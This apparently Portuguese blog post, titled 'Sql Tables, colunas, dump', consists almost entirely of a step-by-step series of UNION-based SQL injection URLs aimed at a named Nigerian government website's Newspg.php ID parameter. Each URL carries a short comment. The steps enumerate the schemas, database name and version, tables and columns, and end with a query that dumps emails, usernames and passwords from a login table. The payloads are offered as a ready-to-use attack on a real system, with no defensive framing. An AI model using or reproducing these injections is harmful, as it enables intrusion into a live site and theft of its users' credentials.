Sql Tables, colunas, dump
https://www.nscdc.gov.ng/Newspg.php?ID=-26+union+select+1,group_concat(schema_name),3,4,5,6,7,8,9,10,11,12 from+information_schema.schemata-- // Checking DataBase From information_schema
https://www.nscdc.gov.ng/Newspg.php?ID=-26+union+select+1,concat(database()),3,4,5,6,7,8,9,10,11,12-- // Check DataBase
https://www.nscdc.gov.ng/Newspg.php?ID=-26+union+select+1,version(),3,4,5,6,7,8,9,10,11,12-- // Chek Version Do Sql
https://www.nscdc.gov.ng/Newspg.php?ID=-26+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database()-- // Check tables of database
https://www.nscdc.gov.ng/Newspg.php?ID=-26+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12 from information_schema.columns where table_schema=database()-- // Check as Columns of tables
https://www.nscdc.gov.ng/Newspg.php?ID=-26+union+select+1,group_concat(0x3a,email,username,0x3a,password),3,4,5,6,7,8,9,10,11,12 from login --- // Check Logins Of Table From Login
Nenhum comentário:
Postar um comentário